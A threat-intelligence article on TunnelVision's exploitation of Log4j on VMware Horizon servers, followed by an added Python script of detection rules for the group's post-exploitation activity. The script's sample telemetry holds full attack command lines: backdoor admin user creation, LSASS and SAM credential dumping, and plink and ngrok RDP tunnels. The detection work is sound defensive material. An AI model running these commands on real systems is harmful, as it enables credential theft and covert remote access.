An Iranian-aligned hacking group tracked as TunnelVision was spotted exploiting Log4j on VMware Horizon servers to breach corporate networks in the Middle East and the United States.
The ultimate goal of TunnelVision appears to be the deployment of ransomware, so the group is focused not only on cyber espionage but also on data destruction and operational disruption. The name refers to tunneling: routing data traffic in such a way that its transmission becomes obfuscated or even hidden.
TunnelVision dropped two custom reverse shell backdoors onto compromised machines. The first payload is a zip file that contains an executable named "InteropServices.exe," which contains an obfuscated reverse shell beaconing to "microsoft-updateserver[.]cf."
The second payload, which was predominantly used by the threat actors in recent attacks, is a modified version of a one-liner PowerShell script available on GitHub. The exploitation process involves the direct execution of PowerShell commands and the activation of reverse shells via the Tomcat service.
TunnelVision relies on this second backdoor to execute reconnaissance commands; create backdoor users and add them to the administrators group; harvest credentials using Procdump, SAM hive dumps, and the comsvcs MiniDump export; download and execute tunneling tools, including Plink and Ngrok, to tunnel RDP traffic; execute a reverse shell through the VMware Horizon NodeJS component; and perform RDP scans of the internal subnet using a publicly available port-scan script.
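The post-exploitation behaviours listed above all leave traces in process-creation telemetry, which makes them a good basis for detection rules. The following is an added example (not code from the article or from any vendor) that runs a small rule set over constructed process-creation records: a shell spawned by a Horizon Tomcat or NodeJS process, backdoor user creation and privilege escalation via `net`, LSASS and SAM dumping via Procdump, comsvcs MiniDump and `reg save`, and Plink or Ngrok tunnels carrying port 3389. The record schema (`parent`, `image`, `cmdline`), the Horizon parent-process name keywords, and every sample event are assumptions made for the example; the only value taken from the article is the beacon domain.

```python
"""Detection rules for the TunnelVision post-exploitation activity described in the article.

Added example, not code from the original article. All events below are constructed
sample data; the field names and Horizon process-name keywords are assumptions.
"""
import re

# Command-line rules: (rule name, regex applied to the lower-cased command line).
RULES = [
    ("backdoor-user-created",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b")),
    ("user-added-to-administrators",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b")),
    ("procdump-lsass",
     re.compile(r"procdump(?:64)?(?:\.exe)?\b.*\blsass\b")),
    ("comsvcs-minidump",
     re.compile(r"comsvcs(?:\.dll)?\s*,?\s*minidump\b")),
    ("sam-hive-dump",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\sam\b")),
    ("rdp-tunnel-plink",
     re.compile(r"\bplink(?:\.exe)?\b.*\b3389\b")),
    ("rdp-tunnel-ngrok",
     re.compile(r"\bngrok(?:\.exe)?\b.*\btcp\b.*\b3389\b")),
]

# Assumption: the Horizon Tomcat service and NodeJS component show up as parents
# whose image names contain these substrings. Adjust to your environment.
HORIZON_PARENT_KEYWORDS = ("tomcat", "node.exe")
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Beacon domain named in the article (defanged there as microsoft-updateserver[.]cf).
KNOWN_C2_DOMAINS = {"microsoft-updateserver.cf"}


def evaluate(events):
    """Return a list of (event_index, rule_name) for every rule an event triggers."""
    hits = []
    for i, ev in enumerate(events):
        cmd = ev["cmdline"].lower()
        parent = ev["parent"].lower()
        image = ev["image"].lower()
        # Initial-access pattern: a shell launched by a Horizon server component.
        if image in SHELL_IMAGES and any(k in parent for k in HORIZON_PARENT_KEYWORDS):
            hits.append((i, "shell-from-horizon-component"))
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((i, name))
    return hits


def is_known_c2(hostname):
    """True if a DNS query or outbound connection targets the beacon domain from the article."""
    return hostname.lower().rstrip(".") in KNOWN_C2_DOMAINS


# Constructed sample telemetry (not real logs): one record per rule plus two benign ones.
SAMPLE_EVENTS = [
    {"parent": "ws_TomcatService.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4..."},
    {"parent": "powershell.exe", "image": "net.exe",
     "cmdline": "net user svc_backup P@ssw0rd! /add"},
    {"parent": "powershell.exe", "image": "net.exe",
     "cmdline": "net localgroup administrators svc_backup /add"},
    {"parent": "powershell.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Temp\l.dmp full"},
    {"parent": "powershell.exe", "image": "procdump64.exe",
     "cmdline": "procdump64.exe -accepteula -ma lsass.exe C:\\Temp\\out.dmp"},
    {"parent": "cmd.exe", "image": "reg.exe",
     "cmdline": r"reg save HKLM\SAM C:\Temp\sam.hive"},
    {"parent": "powershell.exe", "image": "plink.exe",
     "cmdline": "plink.exe -N -R 0.0.0.0:12345:127.0.0.1:3389 user@203.0.113.10 -pw x"},
    {"parent": "powershell.exe", "image": "ngrok.exe",
     "cmdline": "ngrok.exe tcp 3389"},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} :: {SAMPLE_EVENTS[idx]['cmdline']}")
    print("beacon domain match:", is_known_c2("microsoft-updateserver.cf"))
```

The rules are deliberately narrow so they can be tuned per environment; in practice the user-creation and admin-group rules should be joined to the same parent process within a short window, and the shell-from-Horizon rule should be allow-listed for legitimate maintenance scripts before it is used for alerting.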